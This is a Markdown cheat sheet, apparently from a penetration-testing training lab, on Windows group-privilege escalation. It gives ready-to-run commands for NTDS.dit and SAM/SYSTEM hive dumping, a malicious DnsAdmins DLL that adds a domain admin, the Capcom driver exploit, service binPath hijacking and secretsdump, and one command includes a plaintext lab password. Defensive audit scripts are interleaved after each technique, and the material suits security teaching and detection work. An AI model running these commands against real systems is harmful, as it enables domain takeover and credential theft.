# Windows Group Privileges

## Backup Operators

Membership in this group grants its members the SeBackupPrivilege and SeRestorePrivilege.

<https://github.com/giuliano108/SeBackupPrivilege>

#### 1 Import DLLs

```powershell
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
```

#### 2 Enable SeBackupPrivilege

```powershell
# Enable
Set-SeBackupPrivilege

# Verify
Get-SeBackupPrivilege
```

#### 3 Copy File

```powershell
Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt
```

#### 4 Copy NTDS.dit

```powershell
diskshadow.exe

DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit
```

#### 5 Backup SAM + SYSTEM Hives

```powershell
reg save HKLM\SYSTEM SYSTEM.SAV

reg save HKLM\SAM SAM.SAV
```

#### 6 Extract NTDS

```powershell
Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHivePath .\SYSTEM
Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key
```
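Two defender-side checks for the Backup Operators path above, added here as an example (not code from the original notes or from the SeBackupPrivilege project): which backup/restore-class privileges the current token holds, read from `whoami /priv` instead of the third-party DLL, and whether any persistent, client-accessible shadow copy is still exposed, which is what the diskshadow sequence leaves behind. It assumes an elevated PowerShell session on the host being reviewed.

```powershell
# Added example, not part of the original notes. Assumes an elevated session.

function Get-TokenPrivilegeState {
    param([string[]]$Names = @('SeBackupPrivilege', 'SeRestorePrivilege'))
    # whoami /priv /fo csv returns the columns "Privilege Name", "Description", "State"
    $privs = whoami /priv /fo csv | ConvertFrom-Csv
    foreach ($n in $Names) {
        $row = $privs | Where-Object { $_.'Privilege Name' -eq $n }
        [pscustomobject]@{
            Privilege = $n
            Held      = [bool]$row                                  # present on the token at all
            Enabled   = [bool]($row -and $row.State -eq 'Enabled')  # currently enabled
        }
    }
}

function Get-ExposedShadowCopies {
    # "set context persistent" + "expose" in diskshadow produce exactly this combination;
    # a shadow copy exposed as a drive letter is readable by anyone with the backup privilege
    Get-CimInstance -ClassName Win32_ShadowCopy |
        Where-Object { $_.Persistent -and ($_.ExposedLocally -or $_.ExposedRemotely) } |
        Select-Object ID, VolumeName, InstallDate, ClientAccessible, ExposedName, DeviceObject
}

Get-TokenPrivilegeState | Format-Table -AutoSize
Get-ExposedShadowCopies | Format-Table -AutoSize
```

A shadow copy listed by the second function can be removed with `vssadmin delete shadows /Shadow={ID}` once it has been confirmed it is not part of a legitimate backup job.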

## Event Log Readers

### Check Group Membership

```powershell
net localgroup "Event Log Readers"
```

### Searching Security Logs

```powershell
# Without Credentials
wevtutil qe Security /rd:true /f:text | Select-String "/user"

# With Credentials
wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"
```

## DnsAdmins

#### 1 Generate Malicious DLL

```bash
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
```

#### 2 Load DLL

```powershell
dnscmd.exe /config /serverlevelplugindll adduser.dll
```

#### 3 Restart Service

```powershell
sc stop dns
sc start dns
```
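How to check a DNS server for the plugin DLL setting the steps above rely on, added as an example (not code from the original notes): it reads `ServerLevelPluginDll` from the DNS service parameters key, checks the referenced file and its Authenticode signature, lists DnsAdmins membership, and shows the clean-up. It assumes an elevated session on the DNS server itself with RSAT installed.

```powershell
# Added example, not part of the original notes. Assumes an elevated session on the DNS server.

$dnsParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Get-DnsPluginDll {
    $val = Get-ItemProperty -Path $dnsParams -Name ServerLevelPluginDll -ErrorAction SilentlyContinue
    if (-not $val -or [string]::IsNullOrWhiteSpace($val.ServerLevelPluginDll)) {
        return $null   # nothing configured: the expected state on almost every DNS server
    }
    $path   = $val.ServerLevelPluginDll
    $exists = Test-Path -LiteralPath $path
    $sig    = if ($exists) { (Get-AuthenticodeSignature -FilePath $path).Status } else { 'FileMissing' }
    [pscustomobject]@{
        PluginDll  = $path
        Exists     = $exists
        Signature  = $sig
        # A relative or UNC path, or an unsigned image, is not how an admin deploys a plugin
        Suspicious = (-not [System.IO.Path]::IsPathRooted($path)) -or $path.StartsWith('\\') -or ($sig -ne 'Valid')
    }
}

function Get-DnsAdminsMembers {
    Import-Module ActiveDirectory
    # -Recursive expands nested groups, which is where unexpected members hide
    Get-ADGroupMember -Identity 'DnsAdmins' -Recursive | Select-Object Name, SamAccountName, objectClass
}

function Remove-DnsPluginDll {
    # The DLL is only loaded when the service starts, so quarantine the file first,
    # then clear the value and restart DNS
    Remove-ItemProperty -Path $dnsParams -Name ServerLevelPluginDll -ErrorAction SilentlyContinue
    Restart-Service -Name DNS
}

$finding = Get-DnsPluginDll
if ($finding) { $finding | Format-List } else { 'No ServerLevelPluginDll configured.' }
Get-DnsAdminsMembers | Format-Table -AutoSize
```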

## Print Operators

Print Operators is another highly privileged group, which grants its members the SeLoadDriverPrivilege, rights to manage, create, share, and delete printers connected to a Domain Controller, as well as the ability to log on locally to a Domain Controller and shut it down.

<https://raw.githubusercontent.com/3gstudent/Homework-of-C-Language/master/EnableSeLoadDriverPrivilege.cpp>

### 1 Compile CPP File

```powershell
cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp
```

### 2 Add Capcom.sys

```powershell
reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"

reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1
```

### 3 Enable and Verify the Privilege

```powershell
EnableSeLoadDriverPrivilege.exe
```

### 4 Run Exploit

<https://github.com/tandasat/ExploitCapcom>

```powershell
.\ExploitCapcom.exe
```
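A sweep for the artefact the HKCU driver-load technique above leaves behind, added as an example (not code from the original notes): driver service entries under a user hive's `System\CurrentControlSet`, where legitimate driver installs never write (real drivers live under `HKLM\SYSTEM\CurrentControlSet\Services`), plus recent driver loads from Sysmon if it is installed. It assumes an elevated session so that all loaded user hives under `HKEY_USERS` can be read.

```powershell
# Added example, not part of the original notes. Assumes an elevated session.

function Get-UserHiveDriverEntries {
    # HKU: exposes every currently loaded user hive, so all logged-on users are swept at once
    if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
    }
    $hives = Get-ChildItem HKU:\ | Where-Object { $_.PSChildName -match '^S-1-5-21-' -and $_.PSChildName -notlike '*_Classes' }
    foreach ($hive in $hives) {
        $base = "HKU:\$($hive.PSChildName)\System\CurrentControlSet"
        if (-not (Test-Path $base)) { continue }
        foreach ($key in Get-ChildItem $base -ErrorAction SilentlyContinue) {
            $p = Get-ItemProperty $key.PSPath
            if (-not $p.ImagePath) { continue }
            # ImagePath uses the NT object prefix \??\ ; strip it to get a Win32 path
            $file = $p.ImagePath -replace '^\\\?\?\\', ''
            $sig  = if (Test-Path -LiteralPath $file) { (Get-AuthenticodeSignature -FilePath $file).Status } else { 'FileMissing' }
            [pscustomobject]@{
                UserSid   = $hive.PSChildName
                Service   = $key.PSChildName
                ImagePath = $p.ImagePath
                Type      = $p.Type        # 1 = SERVICE_KERNEL_DRIVER
                Signature = $sig
            }
        }
    }
}

function Get-RecentDriverLoads {
    param([int]$Hours = 24)
    # Sysmon Event ID 6 (Driver loaded) records the image path and its signature state;
    # without Sysmon the channel does not exist and nothing is returned
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 6; StartTime = (Get-Date).AddHours(-$Hours) } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $x = [xml]$_.ToXml()
            $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            [pscustomobject]@{ Time = $_.TimeCreated; ImageLoaded = $d.ImageLoaded; Signed = $d.Signed; Signature = $d.Signature; SignatureStatus = $d.SignatureStatus }
        }
}

Get-UserHiveDriverEntries | Format-Table -AutoSize
Get-RecentDriverLoads | Format-Table -AutoSize
```

Any entry from the first function is worth a look regardless of signature: a signed but known-vulnerable driver loaded from a user hive is the whole point of the technique.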

## Server Operators

Membership allows administering Windows servers without being assigned Domain Admin privileges. It is a very highly privileged group that can log in locally to servers, including Domain Controllers.

### 1 Query Service

```powershell
# Check whether the service runs as LocalSystem (SERVICE_START_NAME)
sc qc AppReadiness
```

### 2 Service Permissions Check

<https://learn.microsoft.com/en-us/sysinternals/downloads/psservice>

```powershell
c:\Tools\PsService.exe security AppReadiness
```

### 3 Modify Service Binary Path

```powershell
sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"
```

### 4 Start / Stop Service

```powershell
sc stop AppReadiness
sc start AppReadiness
```

### 5 Dump Hashes

```bash
secretsdump.py server_adm@10.129.43.9 -just-dc-user administrator
```
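An audit of the conditions the Server Operators steps above depend on, added as an example (not code from the original notes): which services grant Server Operators (well-known SID S-1-5-32-549) change-config or start/stop rights, which services have a binary path that is a shell one-liner rather than an executable, and who is in the privileged builtin groups covered on this page. It assumes an elevated session on the server under review; RSAT is needed only for the domain-group lookups.

```powershell
# Added example, not part of the original notes. Assumes an elevated session.

$ServerOperatorsSid = 'S-1-5-32-549'

function Get-ServicesWritableByServerOperators {
    # Service-specific access bits (winsvc.h): SERVICE_CHANGE_CONFIG, SERVICE_START, SERVICE_STOP
    $changeConfig = 0x0002; $start = 0x0010; $stop = 0x0020
    $genericWrite = 0x40000000; $genericAll = 0x10000000
    foreach ($svc in Get-Service) {
        # sc sdshow prints the service SDDL on a line beginning with D:
        $line = (sc.exe sdshow $svc.Name 2>$null) | Where-Object { $_ -match '^D:' } | Select-Object -First 1
        if (-not $line) { continue }
        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($line.Trim())
        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace.AceType -ne 'AccessAllowed') { continue }
            if ($ace.SecurityIdentifier.Value -ne $ServerOperatorsSid) { continue }
            $m = $ace.AccessMask
            $rights = @()
            if ($m -band ($changeConfig -bor $genericWrite -bor $genericAll)) { $rights += 'ChangeConfig' }
            if ($m -band ($start -bor $genericAll)) { $rights += 'Start' }
            if ($m -band ($stop -bor $genericAll)) { $rights += 'Stop' }
            if ($rights.Count -gt 0) {
                [pscustomobject]@{ Service = $svc.Name; Rights = ($rights -join ','); Mask = ('0x{0:X}' -f $m) }
            }
        }
    }
}

function Get-SuspiciousServiceCommands {
    # A binPath that is a shell one-liner is the footprint of "sc config <svc> binPath=" misuse
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -match '(?i)\bcmd(\.exe)?\b.*\s/c\s|\bnet1?\s+(localgroup|group)\b|powershell' } |
        Select-Object Name, StartName, State, PathName
}

function Get-PrivilegedGroupMembers {
    # Builtin groups resolve by well-known SID on any host; DnsAdmins exists only in the domain
    $builtin = @{
        'Backup Operators'  = 'S-1-5-32-551'
        'Print Operators'   = 'S-1-5-32-550'
        'Server Operators'  = 'S-1-5-32-549'
        'Event Log Readers' = 'S-1-5-32-573'
    }
    $hasAd = [bool](Get-Module -ListAvailable -Name ActiveDirectory)
    foreach ($g in (@($builtin.Keys) + 'DnsAdmins')) {
        $members = if ($hasAd) {
            Get-ADGroupMember -Identity $g -Recursive -ErrorAction SilentlyContinue
        } elseif ($builtin.ContainsKey($g)) {
            Get-LocalGroupMember -SID $builtin[$g] -ErrorAction SilentlyContinue
        }
        foreach ($m in $members) {
            [pscustomobject]@{ Group = $g; Member = $m.Name; Class = $m.ObjectClass }
        }
    }
}

Get-ServicesWritableByServerOperators | Format-Table -AutoSize
Get-SuspiciousServiceCommands | Format-Table -AutoSize
Get-PrivilegedGroupMembers | Format-Table -AutoSize
```

A service that shows up in the first list and runs as LocalSystem is the combination the steps above need; the fix is to remove the Server Operators ACE with `sc sdset` (or PsService) rather than to rely on the group being empty.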

